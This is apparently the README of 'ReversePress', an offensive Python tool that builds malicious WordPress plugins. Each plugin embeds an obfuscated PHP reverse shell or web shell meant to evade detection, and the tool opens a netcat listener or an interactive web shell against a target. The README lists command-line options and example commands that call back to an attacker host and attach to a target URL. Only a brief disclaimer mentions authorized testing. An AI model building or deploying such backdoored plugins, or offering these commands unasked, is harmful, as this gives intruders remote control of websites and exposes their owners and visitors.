ReversePress is a Python-based tool designed for generating malicious WordPress plugins. It takes a PHP reverse shell and embeds it into a custom, obfuscated WordPress plugin. The plugin is then compressed into a zip archive ready for deployment. The tool also provides the ability to listen for incoming connections after the plugin has been deployed.
- Embeds a PHP reverse shell into a custom WordPress plugin
- Supports of custom PHP reverse shells
- Obfuscates the plugin code to avoid detection
- Compresses the plugin into a zip archive ready for deployment
- Provides the ability to listen for incoming connections after the plugin has been deployed
- Provides the ability to start an interactive web shell session on the target
usage: reversePress.py [-h] [-i INPUT] [-l] [-o OUTPUT] [-p PORT] host
positional arguments:
host host to connect back to
options:
-h, --help show this help message and exit
-i INPUT, --input INPUT custom PHP reverse shell file to add to the plugin
-l, --listener start a netcat listener after generating the plugin
-o OUTPUT, --output OUTPUT name of the file to be generated
-p PORT, --port PORT port to listen on
-w, --webshell use a PHP web shell
-x TARGET, --xinteractive TARGET
start a interactive web shell on the target
- Clone the repository:
git clone https://github.com/MachadoOtto/reversePress.git
- Install Python 3 if not already installed.
- If using the Netcat listener, ensure that Netcat is installed and available in the system path.
- Run reversePress.py with the desired arguments.
-
Basic usage with default port:
python reversePress.py HOST_IP
-
Use a custom PHP reverse shell:
python reversePress.py HOST_IP -i /path/to/reverse_shell.php
-
Custom port and start a Netcat listener:
python reversePress.py HOST_IP -p 1234 -l
-
Use a PHP web shell and start the Interactive Web Shell session on the target:
python reversePress.py HOST_IP -w -x http://TARGET_IP
This project is licensed under the MIT License. See the LICENSE file for details.
This script is provided as-is, without any warranties or guarantees. Use this tool responsibly and only on systems and applications you are authorized to test. If you use it for evil you should feel bad :(
- The Monada 🙈🙉🙊